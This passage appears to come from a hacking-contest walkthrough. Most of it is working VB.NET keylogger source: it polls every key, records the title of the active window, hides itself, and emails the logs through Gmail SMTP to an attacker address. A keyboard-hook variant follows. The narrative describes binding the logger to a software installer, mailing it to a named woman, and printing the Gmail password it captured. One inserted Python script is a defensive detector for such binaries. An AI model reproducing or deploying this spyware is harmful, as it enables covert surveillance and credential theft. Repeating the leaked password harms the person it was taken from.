            txtNishikieKeys.Text = txtNishikieKeys.Text & "X"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "x"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Y)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "Y"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "y"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Z)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "Z"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "z"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D1)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "1"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "!"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D2)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "2"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "@"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D3)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "3"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "#"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D4)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "4"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "$"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D5)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "5"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "%"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D6)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "6"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "^"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D7)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "7"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "&"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D8)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "8"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "*"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D9)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "9"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "("
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D0)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "0"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ")"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Back)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[backspace]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Tab)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[tab]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Return)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & vbCrLf
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ShiftKey)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[shift]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ControlKey)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[ctrl]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Menu)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[alt]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Pause)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[pause]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Escape)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[esc]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Space)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & " "
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.End)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[end]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Home)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[home]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Left)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[left]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Right)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[right]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Up)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[up]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Down)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[down]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Insert)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[insert]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Delete)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[Delete]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBAS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ";"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ":"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBBS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "="
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "+"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBCS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ","
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "<"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBDS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "-"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "_"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBES)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "."
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & ">"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HBFS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "/"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "?"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HC0S)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "`"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "~"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HDBS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "["
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "["
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HDCS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "\"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "|"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HDDS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "]"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HDES)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "'"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & Chr(34)
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Multiply)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "*"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Divide)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "/"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Add)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "+"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Subtract)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "-"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Decimal)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[Del]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F1)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F1]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F2)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F2]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F3)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F3]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F4)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F4]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F5)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F5]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F6)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F6]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F7)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F7]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F8)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F8]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F9)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F9]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F10)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F10]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F11)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F11]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F12)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F12]"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            Me.Visible = True
            Call RegisterServiceProcess(0, 0)
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumLock)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[NumLock]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Scroll)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[ScrollLock]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Print)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[PrintScreen]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.PageUp)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[PageUp]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.PageDown)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[Pagedown]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad1)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "1"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad2)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "2"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad3)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "3"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad4)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "4"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad5)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "5"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad6)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "6"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad7)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "7"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad8)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "8"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad9)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "9"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad0)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "0"
        End If
        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ControlKey)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[Ctrl]"
        End If
‘this ends checking our keys for now
‘next trap active window so that we can record and associate do It in one of your timers preferably with a short time frame.
Private Function GetActiveWindowTitle() As String
        Dim kiAppCurrent As String
        kiAppCurrent = New String(Chr(0), 100)
        GetWindowText(GetForegroundWindow, kiAppCurrent, 100)
        kiAppCurrent = kiAppCurrent.Substring(0, InStr(kiAppCurrent, Chr(0)) - 1)
        Return kiAppCurrent
    End Function
‘in timer 2 we add what we trap to the window we trapped it from
Dim strin As String = Nothing
        If strin <> GetActiveWindowTitle() Then
            txtNishikieKeys.Text = txtNishikieKeys.Text + vbNewLine & GetActiveWindowTitle() & vbNewLine
            strin = GetActiveWindowTitle()
        End If

Dim MyMailMessage As New MailMessage()
        MyMailMessage.From = New MailAddress("theharvesteruon@gmail.com")
        MyMailMessage.To.Add("theharvesteruon@gmail.com")
        MyMailMessage.Subject = "Team 0wnErz "
        MyMailMessage.Body = txtNishikieKeys.Text
        Dim SMPT As New SmtpClient("smtp.gmail.com")
        SMPT.Port = 587
        SMPT.EnableSsl = True
        SMPT.Credentials = New System.Net.NetworkCredential("theharvesteruon@gmail.com", "")
        SMPT.Send(MyMailMessage)
        txtNishikieKeys.Text = ""
‘before we forget hide the app lol
Me.hide
Me.opacity = 0
Me.ShowInTaskbar = false

For those asking why there are no keyboard hooks and all the initialization: it's XP, so there is no need for paranoia and noise on the system. But here's something to calm you down if you don't like the tiresome but innocent method above.
Private KeyboardHookProcedure As Win32.HookProc
  Public Sub InstallHooks()
             If hKeyboardHook = 0 Then ' install Keyboard hook
            KeyboardHookProcedure = New Win32.HookProc(AddressOf KeyboardHookProc)
            hKeyboardHook = Win32.SetWindowsHookEx( _
                Win32.WH.WH_KEYBOARD_LL, _
                KeyboardHookProcedure, _
                Marshal.GetHINSTANCE(Reflection.Assembly.GetExecutingAssembly().GetModules( )(0)), _
                0)

            If (hKeyboardHook = 0) Then 'SetWindowsHookEx failed
                RemoveHooks()
                Throw New Exception("SetWindowsHookEx failed.")
            End If
        End If
    End Sub

    Public Sub RemoveHooks()
        Dim keyboardResult As Boolean = True

        If hKeyboardHook <> 0 Then
            keyboardResult = Win32.UnhookWindowsHookEx(hKeyboardHook)
            hKeyboardHook = 0
        End If
        If Not keyboardResult Then 'UnhookWindowsHookEx failed
            Throw New Exception("UnhookWindowsHookEx failed.")
        End If
    End Sub
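From the defender's side, the polling code and the hook code above reduce to the same static fingerprint: a key-capture API next to mail-sending types. The sketch below is an added example, not part of the original walkthrough. It assumes plain P/Invoke declarations, where the real export name (`GetAsyncKeyState`, `SetWindowsHookEx`) must appear in the binary whatever the local wrapper is called. The grouping, verdict rules and sample bytes are constructed for illustration.

```python
import re

# Capability groups taken from the code on this page. The API and type names
# are real Win32 exports / .NET members; the grouping and verdict rules are
# assumptions made for this example.
INDICATORS = {
    "key_capture": [b"GetAsyncKeyState", b"SetWindowsHookEx"],
    "window_context": [b"GetForegroundWindow", b"GetWindowText"],
    "mail_exfil": [b"SmtpClient", b"MailMessage", b"smtp."],
    "self_hiding": [b"RegisterServiceProcess", b"ShowInTaskbar", b"set_Opacity"],
}

ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")           # metadata names, imports
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")   # .NET user strings


def extract_strings(blob):
    """Return printable ASCII and UTF-16LE runs of four or more characters."""
    found = [m.group() for m in ASCII_RUN.finditer(blob)]
    found += [m.group()[::2] for m in UTF16_RUN.finditer(blob)]
    return found


def triage(blob):
    """Score a binary by which capability groups its strings reveal."""
    strings = [s.lower() for s in extract_strings(blob)]
    hits = {}
    for group, needles in INDICATORS.items():
        matched = sorted(n.decode() for n in needles
                         if any(n.lower() in s for s in strings))
        if matched:
            hits[group] = matched
    if "key_capture" in hits and "mail_exfil" in hits:
        verdict = "high"      # captures keys and can mail them out
    elif "key_capture" in hits:
        verdict = "review"    # hotkey tools and games also poll keys
    else:
        verdict = "low"
    return {"verdict": verdict, "hits": hits}


def utf16(text):
    """Encode text the way .NET stores string literals."""
    return text.encode("utf-16-le")


# Constructed samples (not real binaries): byte strings laid out like the
# name and string heaps of a compiled .NET program.
SAMPLE_LOGGER = (b"\x00GetAsyncKeyState\x00user32\x00GetForegroundWindow\x00"
                 b"GetWindowText\x00SmtpClient\x00set_ShowInTaskbar\x00"
                 + utf16("smtp.example.test") + b"\x00\x00")
SAMPLE_HOTKEY_TOOL = b"\x00GetAsyncKeyState\x00user32\x00MessageBoxW\x00"
SAMPLE_BENIGN = b"\x00GetForegroundWindow\x00MessageBoxW\x00" + utf16("Ready")

if __name__ == "__main__":
    for name, blob in [("logger", SAMPLE_LOGGER),
                       ("hotkey", SAMPLE_HOTKEY_TOOL),
                       ("benign", SAMPLE_BENIGN)]:
        print(name, triage(blob))
```

A "high" verdict is a reason to pull the file for dynamic analysis, not a conviction: installers bound to a second payload, as described later in this walkthrough, are exactly where such a string pass earns its keep.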

Also, on the Hackbattle group they mentioned that the VPS was by Azanuru, so we checked them out while we built the keylogger. We needed as much as we could get, as we planned to own Joan.
So we visited the Azanuru site and, guess what, it was an open test day until the 20th. It was running on OpenStack and had 3 public IP subnets up and running, one of them on the same network as the VPS running Nasty Salon. Interestingly, from phpinfo we saw an Ubuntu install, so we launched a 13.10 instance as in the blog's tutorial, joined the subnet with the VPS and got a floating IP of:

197.232.19.197
The Azanuru guys noticed and sent us a mail asking us to join the .20 subnet instead, and kicked our floating IP out. But one thing we now knew: we were using a keypair to log in, and it had sudo access. Amazing.

So this (the keypair) is what we would be targeting from Joan, not other credentials.
So they kicked us out, but by the way, here is a feel of how the droplet started failing:
2014-03-10 15:16:42,647 - url_helper.py[WARNING]: Calling
2014-03-10 15:17:39,795 - url_helper.py[WARNING]: Calling 'http://169.254.169.254/2009-04-04/meta-data/instance-id' failed [112/120s]: request error [HTTPConnectionPool(host='169.254.169.254', port=80): Max retries exceeded with url: /2009-04-04/meta-data/instance-id (Caused by : [Errno 101] Network is unreachable)]
2014-03-10 15:17:46,809 - url_helper.py[WARNING]: Calling 'http://169.254.169.254/2009-04-04/meta-data/instance-id' failed [119/120s]: request error [HTTPConnectionPool(host='169.254.169.254', port=80): Max retries exceeded with url: /2009-04-04/meta-data/instance-id (Caused by : [Errno 101] Network is unreachable)]
2014-03-10 15:17:53,822 - DataSourceEc2.py[CRITICAL]: Giving up on md from ['http://169.254.169.254/2009-04-04/meta-data/instance-id'] after 126 seconds
2014-03-10 15:17:53,826 - util.py[WARNING]: Getting data from failed
Cloud-init v. 0.7.3 running 'modules:config' at Mon, 10 Mar 2014 15:17:54 +0000. Up 262.78 seconds.
 * Starting AppArmor profiles        Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd

So we finished our keylogger in 2 versions and used Easy Binder to bind them to Simfatic Forms. We uploaded them to our spa site and sent the mail to Joan.
As soon as she installed it, logs started coming in to our harvester and we got good things:

http://spa.oo3.co/soft/Simfatic-setup-4.exe 
http://spa.oo3.co/soft/simfatic-setup-2.exe 
 
The version of the software we bound was meant to show an error message. That gave us leeway, in case of a problem, to talk to her and send a second keylogger that used a different method of logging, so that we would still succeed if the first one failed.

But the keylogger never failed us, so here we are. Confirmed: XP was right.

So we got this password as she typed her Gmail password :
Tuesday, March 18, 2014 [12:23 PM] thunderbird.exe: Mail Server Password Required
n@stys4l0nw3b
Time to log in to the Gmail account and see how much we can get. I think the pictures will speak for us here:
